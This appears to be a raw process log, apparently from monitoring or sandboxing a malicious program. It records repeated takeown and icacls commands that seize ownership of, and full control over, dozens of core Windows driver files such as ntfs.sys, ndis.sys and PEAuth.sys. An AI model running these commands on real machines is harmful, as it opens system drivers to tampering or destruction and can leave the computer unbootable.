"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "703830686-18832782451315379208505901653-872758435-901954956-1069230439854398671"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-10222369441547619177-1128781181-828518103-2020065146-31463427918918190431041255174"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\monitor.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mouclass.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mouhid.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mountmgr.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mpio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-611363521-733123145-8003155081411958019-718818442417605973-237542845-488589514"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mpsdrv.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxdav.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb10.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mrxsmb20.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msahci.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20176436511357595528-1930889624491223342-108323048510980545-12733265452106010228"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msdsm.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msfs.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mshidkmdf.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msiscsi.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msisadrv.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-554039330-1128682238-119930085-1224600561-1533420919-226668337-13686080731756643441"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mskssrv.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mspclock.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\msrpc.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mspqm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mssmbios.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mstee.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\MTConfig.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\mup.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "601385272-500299970-208196289-1015334181-18472648-202453479864829991-1163836809"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-5244676582086722926-29822424912509235851393091728138981613403223397-99396740"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndis.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndiscap.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndisuio.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndistapi.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndiswan.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ndproxy.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netbios.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netbt.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2071444154-1147846810-12789952431036739678-1458351457-1033300190-24615873-1185860623"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\netio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nfrd960.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1451798477-8094493471886791001-79910681135383043500777672080465006-1113187040"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\npfs.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nsiproxy.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ntfs.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\null.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nvraid.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\NV_AGP.SYS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nvstor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\nwifi.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ohci1394.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pacer.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\partmgr.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\parport.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pci.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pciide.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pciidex.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1114066056-1860570882-559596620581132139725423313410928385-28683914626468660"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1547065175-499439002-1701345534-1892808526-9627066241034252229-9136830301662874310"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pcmcia.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1491093816-2143591514175457998397858548777982041548576779517884707622060768732"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pcw.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\PEAuth.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1925780581-1675626418-1885064460-1405878522773504781-2077094202-5471460241149225935"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ql2300.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\portcls.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\processr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9074396539797228852084206271737128460560570833-4066442514807948991070354968"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ql40xx.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\qwavedrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "564627883383864916528357898128934988883052169722332815957667544-1874125811"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rasacd.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rasl2tp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\raspppoe.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "57792406118663929421029516556-1252899095-461462339229395647-839201930-1242987632"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\raspptp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rassstp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdbss.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-214459968-27801096-9766348341843907210951146799298645850-1456140768-1527905404"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpbus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RDPCDD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpdr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "105192784598452841-96539747-1950108307-1532624096-1831775603492519287939129571"
